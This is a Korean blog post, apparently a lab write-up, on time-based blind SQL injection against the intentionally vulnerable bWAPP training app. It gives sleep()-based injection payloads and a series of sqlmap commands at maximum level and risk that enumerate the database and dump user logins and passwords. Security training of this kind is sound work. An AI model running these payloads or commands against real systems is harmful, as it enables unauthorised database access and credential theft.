이전 글과 같은 blind sql 방식이다.

안의 박스에 내용을 입력하면 영화가 있는지 없는지를 e-mail로 전송해 주어서 바로 내가 입력한 값이 참인지 거짓인지 구분할 수 없다.
따라서 sleep()이라는 함수를 사용할 것인데
sleep() 함수는 ()안에 들어간 초만큼 출력 결과가 지연된다.
'or 1=1 and sleep(1)# 처럼
앞 부분이 참 이이면 sleep 함수가 실행되어서 이메일 전송이 살짝 지연이 되고
'or 1=0 and sleep(1)# 처럼
뒷 부분이 거짓이면 sleep함수는 실행 되지 않으므로 지연 없이 바로 출력값이 나오게 될 것이다.
이 방식으로 참과 거짓을 구분하여 blind 인젝션 방식을 사용한다
' or 1=1 and length(database())=5 and sleep(1)#
내용은 이전 글과 같은 내용이니 생략
sqlmap 을 사용하여서 이런 노가다 없이 쉽게 뚫을 수도 있다
# sqlmap -u "http://192.168.147.128/bWAPP/sqli_15.php?title=&action=search"
--cookie="security_level=0; PHPSESSID=deca8cf8f88d9d012d38026a2d6b4f8d" -p "title" --dbs
--batch --threads=5 --level=5 --risk=3
* --dbs : 데이터베이스 리스트 출력
* --batch : 명령어 수행 중 질문에 default 값으로 답함
* --threads : 공격 수행하는 thread 개수를 지정
* --level=5 --risk=3 : 최고 레벨의 공격까지 수행
# sqlmap -u "http://192.168.147.128/bWAPP/sqli_15.php?title=&action=search"
--cookie="security_level=0; PHPSESSID=deca8cf8f88d9d012d38026a2d6b4f8d" -p "title"
--batch --threads=5 --level=5 --risk=3 -D "bWAPP" --tables
* -D : 데이터베이스 지정
* --tables : 테이블 목록을 출력
# sqlmap -u "http://192.168.147.128/bWAPP/sqli_15.php?title=&action=search"
--cookie="security_level=0; PHPSESSID=deca8cf8f88d9d012d38026a2d6b4f8d" -p "title"
--batch --threads=5 --level=5 --risk=3 -T "heroes" --columns
* -T : 테이블 지정
* --columns : 컬럼 목록 출력
# sqlmap -u "http://192.168.147.128/bWAPP/sqli_15.php?title=&action=search"
--cookie="security_level=0; PHPSESSID=deca8cf8f88d9d012d38026a2d6b4f8d" -p "title"
--batch --threads=5 --level=5 --risk=3 -T "heroes" -C id,login,password --dump
* -C : 컬럼 지정
'모의해킹' 카테고리의 다른 글
| XML/Xpath injection - Search (0) | 2025.02.23 |
|---|---|
| XML/XPath Injection (Login Form) (0) | 2025.02.20 |
| 페이로드 (0) | 2025.02.12 |
| SQL injection - blind (Boolean-Based) (0) | 2025.02.12 |
| XSS - Stored (Blog) (0) | 2025.02.12 |